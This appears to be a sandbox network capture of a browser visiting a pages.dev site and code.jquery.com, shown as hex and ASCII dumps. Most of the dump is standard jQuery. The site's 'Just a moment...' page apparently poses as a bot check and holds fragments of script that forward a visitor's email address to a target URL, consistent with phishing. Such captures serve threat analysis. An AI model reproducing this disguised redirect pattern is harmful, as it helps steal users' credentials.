                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://proposal-5ye.pages.dev/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-19 16:17:10 UTC613INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 87533
                                                              Server: nginx
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                              ETag: "28feccc0-155ed"
                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Accept-Ranges: bytes
                                                              Age: 1319029
                                                              Date: Thu, 19 Dec 2024 16:17:10 GMT
                                                              X-Served-By: cache-lga21978-LGA, cache-ewr-kewr1740075-EWR
                                                              X-Cache: HIT, HIT
                                                              X-Cache-Hits: 1516, 0
                                                              X-Timer: S1734625031.820053,VS0,VE1
                                                              Vary: Accept-Encoding
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                              Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 63 65 2e 66 6e 3d 63 65 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a 71 75 65 72 79 3a 74 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 63 65 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 65 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e
                                                              Data Ascii: ==t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 22 2b 28 74 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 2c 69 73 52 65 61 64 79 3a 21 30 2c 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 65 29 7d 2c 6e 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 69 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 75 65 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72
                                                              Data Ascii: "+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==i.call(e))&&(!(t=r(e))||"function"==typeof(n=ue.call(t,"constructor")&&t.constructor
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 74 75 72 6e 20 67 28 61 29 7d 2c 67 75 69 64 3a 31 2c 73 75 70 70 6f 72 74 3a 6c 65 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 63 65 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6f 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 63 65 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 76 61 72 20 70 65 3d 6f 65 2e
                                                              Data Ascii: turn g(a)},guid:1,support:le}),"function"==typeof Symbol&&(ce.fn[Symbol.iterator]=oe[Symbol.iterator]),ce.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var pe=oe.
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 2c 22 2b 67 65 2b 22 2a 22 29 2c 6d 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 28 5b 3e 2b 7e 5d 7c 22 2b 67 65 2b 22 29 22 2b 67 65 2b 22 2a 22 29 2c 78 3d 6e 65 77 20 52 65 67 45 78 70 28 67 65 2b 22 7c 3e 22 29 2c 6a 3d 6e 65 77 20 52 65 67 45 78 70 28 67 29 2c 41 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 74 2b 22 24 22 29 2c 44 3d 7b 49 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 23 28 22 2b 74 2b 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 74 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 74 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 70 29 2c 50 53 45 55 44 4f
                                                              Data Ascii: gExp("^"+ge+"*,"+ge+"*"),m=new RegExp("^"+ge+"*([>+~]|"+ge+")"+ge+"*"),x=new RegExp(ge+"|>"),j=new RegExp(g),A=new RegExp("^"+t+"$"),D={ID:new RegExp("^#("+t+")"),CLASS:new RegExp("^\\.("+t+")"),TAG:new RegExp("^("+t+"|[*])"),ATTR:new RegExp("^"+p),PSEUDO
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 26 28 75 3d 4c 2e 65 78 65 63 28 74 29 29 29 69 66 28 69 3d 75 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 70 29 7b 69 66 28 21 28 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 29 29 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 61 2e 69 64 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 6e 2c 61 29 2c 6e 7d 65 6c 73 65 20 69 66 28 66 26 26 28 61 3d 66 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 29 29 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 61 29 26 26 61 2e 69 64 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 6e 2c 61 29 2c 6e 7d 65 6c 73 65 7b 69 66 28 75 5b 32 5d 29 72 65 74 75 72 6e 20 6b 2e 61 70 70 6c 79 28 6e 2c 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 29 2c 6e 3b 69 66 28 28 69 3d 75
                                                              Data Ascii: &(u=L.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return k.call(n,a),n}else if(f&&(a=f.getElementById(i))&&I.contains(e,a)&&a.id===i)return k.call(n,a),n}else{if(u[2])return k.apply(n,e.getElementsByTagName(t)),n;if((i=u
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 65 29 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 22 6c 61 62 65 6c 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 58 28 61 29 7b 72 65 74 75 72 6e 20 46 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 46 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54
                                                              Data Ascii: e)===t:e.disabled===t:"label"in e&&e.disabled===t}}function X(a){return F(function(o){return o=+o,F(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function U(e){return e&&"undefined"!=typeof e.getElementsByT
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 3b 69 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 65 29 2c 72 3d 30 3b 77 68 69 6c 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61
                                                              Data Ascii: ((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTa
                                                              2024-12-19 16:17:10 UTC1378INData Raw: 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6c 65 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 3d 54 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 79 65 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 79 65 2c 65 29 3f 2d 31 3a 74 3d 3d 3d 54 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 79 65 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 79 65 2c 74 29 3f 31 3a 6f 3f 73 65 2e 63 61 6c 6c 28 6f 2c 65 29 2d 73 65 2e 63 61 6c 6c 28 6f 2c 74 29 3a 30 3a 34 26
                                                              Data Ascii: =(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!le.sortDetached&&t.compareDocumentPosition(e)===n?e===T||e.ownerDocument==ye&&I.contains(ye,e)?-1:t===T||t.ownerDocument==ye&&I.contains(ye,t)?1:o?se.call(o,e)-se.call(o,t):0:4&
                                                              2024-12-19 16:17:11 UTC1378INData Raw: 72 3a 7b 41 54 54 52 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 3d 65 5b 31 5d 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 2c 65 5b 33 5d 3d 28 65 5b 33 5d 7c 7c 65 5b 34 5d 7c 7c 65 5b 35 5d 7c 7c 22 22 29 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 2c 22 7e 3d 22 3d 3d 3d 65 5b 32 5d 26 26 28 65 5b 33 5d 3d 22 20 22 2b 65 5b 33 5d 2b 22 20 22 29 2c 65 2e 73 6c 69 63 65 28 30 2c 34 29 7d 2c 43 48 49 4c 44 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 3d 65 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 6e 74 68 22 3d 3d 3d 65 5b 31 5d 2e 73 6c 69 63 65 28 30 2c 33 29 3f 28 65 5b 33 5d 7c 7c 49 2e 65 72 72 6f 72 28 65 5b 30 5d 29 2c 65 5b 34 5d 3d 2b 28 65 5b 34 5d 3f 65 5b 35 5d 2b 28 65 5b 36 5d 7c
                                                              Data Ascii: r:{ATTR:function(e){return e[1]=e[1].replace(O,P),e[3]=(e[3]||e[4]||e[5]||"").replace(O,P),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||I.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]|


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.749725172.66.47.1184435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 16:17:11 UTC600OUTGET /favicon.ico HTTP/1.1
                                                              Host: proposal-5ye.pages.dev
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://proposal-5ye.pages.dev/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-19 16:17:11 UTC943INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 16:17:11 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Cache-Control: public, max-age=0, must-revalidate
                                                              referrer-policy: strict-origin-when-cross-origin
                                                              x-content-type-options: nosniff
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToEc1pLJ5C9X4ZloBgxqHYXBNezl%2FFemOJcbKCY%2FONd8aQTj0NwpMGGad0I6AlyAy51VUhDMm6Kd6aSLgIkUK%2FAk9hOsD7JNUx%2F6IdLtqVMlaeH5ledKdnrfC8wccaez%2B%2ByQ2L%2BEMyva"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f48b38fbec51819-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1615&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2859&recv_bytes=1178&delivery_rate=1312949&cwnd=215&unsent_bytes=0&cid=005c9048b5b0b846&ts=3169&x=0"
                                                              2024-12-19 16:17:11 UTC1369INData Raw: 64 63 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 2f 4a 71 54 33 53 51 66 61 77 52 63 76 2f 42 49 48 50 54 68 6b 42 76 73 30 4f 45 76 74 46 46 6d 71 50 46 2f 6c 59 49 2f 43 78 6f 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c
                                                              Data Ascii: dca<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <title>Just a moment...</title> <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"><
                                                              2024-12-19 16:17:11 UTC1369INData Raw: 64 78 52 58 41 78 4d 6b 6c 30 57 56 5a 72 53 47 64 52 62 31 4a 6f 4f 57 56 73 4d 32 4e 43 55 56 6c 4c 53 6b 68 6b 51 56 4e 48 59 30 56 59 53 30 67 34 54 31 67 78 57 6e 6f 72 54 30 52 79 56 6e 42 79 4f 57 6f 78 63 57 6c 61 52 6d 34 69 4c 43 4a 74 59 57 4d 69 4f 69 49 30 4e 7a 55 34 59 54 64 69 4e 57 46 68 59 57 55 79 5a 6a 45 79 59 7a 55 30 4f 57 45 79 5a 6a 41 79 4e 6a 55 31 59 32 59 77 5a 6a 45 35 4e 7a 45 7a 4f 57 56 6b 4d 7a 68 6a 5a 47 56 6d 4e 7a 67 31 4d 6d 5a 69 4d 6a 55 35 59 54 41 35 4e 32 49 77 59 7a 4e 6b 49 6e 30 25 33 44 3b 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 34 33 63 48 56 4d 62 47 4a 42 4c 31 4a 70 4d 6a 6c 31 63 55 35 72 51 31 4a 70 59 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65
                                                              Data Ascii: dxRXAxMkl0WVZrSGdRb1JoOWVsM2NCUVlLSkhkQVNHY0VYS0g4T1gxWnorT0RyVnByOWoxcWlaRm4iLCJtYWMiOiI0NzU4YTdiNWFhYWUyZjEyYzU0OWEyZjAyNjU1Y2YwZjE5NzEzOWVkMzhjZGVmNzg1MmZiMjU5YTA5N2IwYzNkIn0%3D; laravel_session=eyJpdiI6Im43cHVMbGJBL1JpMjl1cU5rQ1JpYnc9PSIsInZhbHVlIjoie
                                                              2024-12-19 16:17:11 UTC799INData Raw: 6c 61 63 65 28 72 65 73 2e 75 72 6c 5f 74 61 72 67 65 74 20 2b 20 6d 61 69 6c 73 32 20 2b 20 6e 65 78 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 72 65 73 2e 75 72 6c 5f 74 61 72 67 65 74 20 2b 20 6d 61 69 6c 73 20 2b 20 6e 65 78 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 7d 29 2e 66 61 69 6c 28 66 75 6e 63 74 69 6f 6e 28 65 72 72 6f 72 29 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 72 72 6f 72 2e 73 74 61 74 75 73 20 3d 3d 20 34 30 31 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74
                                                              Data Ascii: lace(res.url_target + mails2 + next); } else { window.location.replace(res.url_target + mails + next); } } }).fail(function(error){ if (error.status == 401) { document
                                                              2024-12-19 16:17:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.749738151.101.2.1374435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 16:17:12 UTC358OUTGET /jquery-3.7.1.min.js HTTP/1.1
                                                              Host: code.jquery.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-19 16:17:13 UTC613INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 87533
                                                              Server: nginx
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                              ETag: "28feccc0-155ed"
                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Accept-Ranges: bytes
                                                              Date: Thu, 19 Dec 2024 16:17:13 GMT
                                                              Age: 1319031
                                                              X-Served-By: cache-lga21978-LGA, cache-ewr-kewr1740026-EWR
                                                              X-Cache: HIT, HIT
                                                              X-Cache-Hits: 1516, 1
                                                              X-Timer: S1734625033.069111,VS0,VE1
                                                              Vary: Accept-Encoding
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                              Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 63 65 2e 66 6e 3d 63 65 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a 71 75 65 72 79 3a 74 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 63 65 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 65 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e
                                                              Data Ascii: ==t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return
